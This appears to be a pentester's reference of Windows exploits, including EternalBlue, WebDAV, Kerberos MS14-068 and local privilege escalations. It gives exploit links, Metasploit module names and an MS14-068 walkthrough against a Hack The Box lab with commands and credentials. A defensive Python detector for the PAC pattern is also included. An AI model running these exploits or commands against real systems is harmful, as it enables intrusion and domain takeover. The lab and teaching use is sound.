Windows issues
Remote Exploits
IIS
MS16-143 / CVE-2017-7269
- Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2.
- Allows remote code execution.
- Via a long header beginning with "If: <http://" in a PROPFIND request.
Exploits:
- https://www.exploit-db.com/exploits/41738
- https://github.com/gottburgm/Exploits/tree/master/CVE-2017-7269
- https://github.com/edwardz246003/IIS_exploit
- exploit/windows/iis/iis_webdav_scstoragepathfromurl
References:
- 0patching the "Immortal" CVE-2017-7269
SMB
MS17-010 - EternalBlue SMB Remote Windows Kernel Pool Corruption
- Vista SP2, 2008 SP2, 7 SP1, 2008 R2, 8.1, 2012, 2012 R2, RT 8.1, 10, 2016
- CVE-2017-0143 to CVE-2017-0148
Exploit:
- https://github.com/worawit/MS17-010
- https://github.com/nixawk/labs/blob/master/MS17_010/smb_exploit.py
- https://github.com/qazbnm456/awesome-cve-poc/blob/master/MS17-010.md
- exploit/windows/smb/ms17_010_eternalblue
References:
- https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/
- https://github.com/qazbnm456/awesome-cve-poc/blob/master/MS17-010.md
- https://blog.rapid7.com/2017/05/19/metasploit-the-power-of-the-community-and-eternalblue/
Active Directory / Kerberos
MS14-068 (PyKEK)
- KDC did not validate the PAC checksum correctly
- Can rewrite a ticket to be domain admin
- Internals:
  - Request a TGT with no PAC
  - Create a forged PAC signed with the user's password hash
  - The TGT is sent with the forged PAC as the authenticator
  - KDC does validation:
    - Request is for a Service Ticket with no PAC
    - Sees that the TGT has no PAC
    - Takes the forged PAC from the authenticator
    - Includes it in a new TGT and uses it for issuing the Service Ticket
  - Request a delegation ticket to get it working across DCs
Detect by:
- AS-REQ and TGS-REQ both containing "Include PAC: false"
Fix:
- Apply KB3011780 before DCPromo
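The detection hint above (both the AS-REQ and the TGS-REQ carrying "Include PAC: false") can be checked on decoded Kerberos pre-authentication data. The following is an added example, not code from the original notes: it decodes the DER body of the PA-PAC-REQUEST padata (padata-type 128, KERB-PA-PAC-REQUEST ::= SEQUENCE { include-pac [0] BOOLEAN }) and flags the MS14-068 pattern. The sample padata lists are constructed.

```python
"""Flag Kerberos requests that explicitly ask the KDC to omit the PAC (MS14-068 tell)."""

PA_PAC_REQUEST = 128  # padata-type of KERB-PA-PAC-REQUEST (MS-KILE)


def _read_tlv(buf, pos):
    """Return (tag, value, next_pos) for one DER TLV; short-form length is all this type needs."""
    tag, length = buf[pos], buf[pos + 1]
    if length & 0x80:
        raise ValueError("long-form DER length not expected in PA-PAC-REQUEST")
    start = pos + 2
    return tag, buf[start:start + length], start + length


def parse_pa_pac_request(der):
    """Decode KERB-PA-PAC-REQUEST ::= SEQUENCE { include-pac [0] BOOLEAN } -> bool."""
    tag, seq, _ = _read_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("expected SEQUENCE")
    tag, ctx0, _ = _read_tlv(seq, 0)
    if tag != 0xA0:
        raise ValueError("expected [0] context tag")
    tag, boolean, _ = _read_tlv(ctx0, 0)
    if tag != 0x01 or len(boolean) != 1:
        raise ValueError("expected single-byte BOOLEAN")
    return boolean[0] != 0


def asks_to_omit_pac(padata):
    """padata: list of (padata-type, value bytes) from one AS-REQ or TGS-REQ."""
    return any(ptype == PA_PAC_REQUEST and parse_pa_pac_request(value) is False
               for ptype, value in padata)


def flag_ms14_068_pattern(as_req_padata, tgs_req_padata):
    """True only when BOTH requests of the exchange ask for a PAC-less ticket."""
    return asks_to_omit_pac(as_req_padata) and asks_to_omit_pac(tgs_req_padata)


# Constructed samples: a normal Windows client sends include-pac = TRUE (0xff),
# the PyKEK flow sends include-pac = FALSE (0x00) in both requests.
NORMAL_REQ = [(PA_PAC_REQUEST, bytes.fromhex("3005a0030101ff"))]
PAC_FALSE_REQ = [(PA_PAC_REQUEST, bytes.fromhex("3005a003010100"))]

if __name__ == "__main__":
    print("MS14-068 pattern:", flag_ms14_068_pattern(PAC_FALSE_REQ, PAC_FALSE_REQ))
```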
RPC
MS03-026 - DCOM RPC Overflow Discovered by LSD
- Over port 135
Exploit:
- https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS03-026
References:
- https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS03-026
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/10-years-on-a-look-back-at-ms08-067/
MS05-017
Exploit:
- https://raw.githubusercontent.com/offensive-security/exploitdb/master/exploits/windows/remote/1075.c
MS07-029 - Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)
MS07-065
Other (Local)
MS17-013 - Microsoft Graphics Component
- Vista SP2, 2008 SP2, 7 SP1, 2008 R2, RT 8.1, 10, 2016
Exploit:
- https://www.exploit-db.com/exploits/41656
References:
MS10-061 - Windows Printer Spooler (Stuxnet)
- XP SP2/SP3, 2003 SP2, Vista SP1/SP2, 2008, 7, 2008 R2
- Execute code with SYSTEM privilege if a printer is shared on the network (patched September 2010)
- Make a DCE RPC request to the StartDocPrinter procedure (notifies the spooler that a new job arrived)
- Impersonate the Printer Spooler service (spoolsv.exe) to create a file (from working dir: %SystemRoot%\system32)
- By sending WritePrinter requests, an attacker can fully control the content of the created file
- Gain code execution by writing to a directory used by WMI to deploy applications: Wbem\Mof is periodically scanned and any new .mof files
References:
- http://poppopret.blogspot.com/2011/09/playing-with-mof-files-on-windows-for.html
- os/windows/wmi.md
Privilege Escalation Exploits
MS16-032 - Secondary Logon to Address Elevation of Privilege
- Win7-Win10 & 2008-2012 - 32/64 bit
- Machine must have 2+ CPU cores
Exploits:
- https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-032
- http://willgenovese.com/ms16-032-one-liners/
- ms16_032_secondary_logon_handle_privesc
References:
- https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html
MS11-080 - Ancillary Function Driver (AfdJoinLeaf)
- XP, 2003 - 32/64 bit
Exploits:
- https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS11-080
- https://www.exploit-db.com/exploits/18176
- https://hackingandsecurity.blogspot.com/2016/05/ms11-080-privilege-escalation-windows.html
Build a standalone executable from the Python exploit with the PyInstaller module:
python pyinstaller.py --onefile example.py
MS12-042 - Windows Kernel - SYSRET
- XP SP3, 2003, 7, 2008 R2
Exploits:
- https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS12-042
- https://www.exploit-db.com/exploits/20861
MS15-051 - Windows Kernel-Mode Drivers (client_copy_image)
- 2003 SP2, Vista SP2, 2008 SP2, 7 SP1, 2008 R2 SP1, 8, 8.1, 2012, 2012 R2, RT, RT 8.1 - 32/64 bit
Exploits:
- https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051
- https://www.exploit-db.com/exploits/37049
- https://github.com/hfiref0x/CVE-2015-1701
- exploit/windows/local/ms15_051_client_copy_image
References:
- https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html
MS10-092 - Task Scheduler
- Vista SP1/SP2, 2008, 7, 2008 R2 - 32/64 bit
Exploits:
- https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-092
- exploit/windows/local/ms10_092_schelevator
References:
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-092
- http://daveschull.com/wp-content/uploads/2015/05/Stuxnet_Under_the_Microscope.pdf
MS14-058 - TrackPopupMenu Win32k NULL Pointer Dereference
- 2003, Vista, 2008, 2008 R2, 8, 8.1, 2012, 2012 R2, RT, RT 8.1
Exploits:
- https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-058
- exploit/windows/local/ms14_058_track_popup_menu
References:
- https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/
- https://www.freebuf.com/articles/system/50110.html
MS14-070 - tcpip!SetAddrOptions NULL Pointer Dereference
- 2003 SP2
Exploits:
- https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-070
- exploit/windows/local/ms14_070_tcpip_ioctl
References:
- https://blog.korelogic.com/blog/2015/01/28/2k3_tcpip_setaddroptions_exploit_dev
- https://korelogic.com/Resources/Advisories/KL-001-2015-001.txt
bypassuac_eventvwr
MS10-015 - Kitrap0d
MS14-068 - Kerberos Domain Privilege Escalation
Exploits:
- Python Kerberos Exploitation Kit - https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
- The Mystery of Duqu 2.0: a sophisticated cyberespionage actor returns
Install the Kerberos client tools:
apt-get install krb5-user cifs-utils rdate
# Add proper nameservers in /etc/hosts
Edit /etc/krb5.conf (the realm name and domain entries must all match the target domain, HTB.LOCAL here):
[libdefaults]
    default_realm = HTB.LOCAL
    # The following krb5.conf variables are only for MIT Kerberos.
    kdc_timesync = 1
    ccache_type = 4
    forwardable = true
    proxiable = true
# Edit the realms entry as follows:
[realms]
    HTB.LOCAL = {
        kdc = mantis.htb.local:88
        admin_server = mantis.htb.local
        default_domain = HTB.LOCAL
    }
# Also edit the final section:
[domain_realm]
    .htb.local = HTB.LOCAL
    htb.local = HTB.LOCAL
Sync the local clock with the DC (Kerberos rejects tickets with a large time skew):
net time -S 10.10.10.52 -U ""
# Set local time accordingly
# OR USE
rdate -n 10.10.10.52
Generate the ticket:
python ms14-068.py -u james@htb.local -d mantis.htb.local -p J@m3s_P@ssW0rd! -s S-1-5-21-4220043660-4019079961-2895681657
Rename the generated ticket to /tmp/krb5cc_0:
mv TGT_James@HTB.local.ccache /tmp/krb5cc_0
With Impacket (goldenPac module):
- kinit james (options ?)
- klist (options ?)
- python goldenPac.py htb.local/james@mantis.htb.local
- Enter the password for the james user
Manually:
smbclient -W HTB.LOCAL //MANTIS/c$ -k
References:
- Additional information about CVE-2014-6324
- Attack Methods for Gaining Domain Admin Rights in Active Directory
- HTB - Mantis
CVE-2017-0213 - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation
- 10, 7, 8.1, 2008, 2008 R2, 2012, 2012 R2, 2016
- When accessing an OOP COM object using IRemUnknown2 the local unmarshaled proxy can be for a different interface to that requested by QueryInterface resulting in a type confusion which can result in EoP.
Exploit:
- https://github.com/WindowsExploits/Exploits/tree/master/CVE-2017-0213
References:
- https://bugs.chromium.org/p/project-zero/issues/detail?id=1107
- https://www.exploit-db.com/exploits/42020
MS11-013
Juicy Potato
- Needs SeImpersonate or SeAssignPrimaryToken (check with whoami /priv)
- https://github.com/ohpe/juicy-potato
- https://github.com/TsukiCTF/Lovely-Potato
- http://ohpe.it/juicy-potato/CLSID/Windows_Server_2012_Datacenter/
- Internals: Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/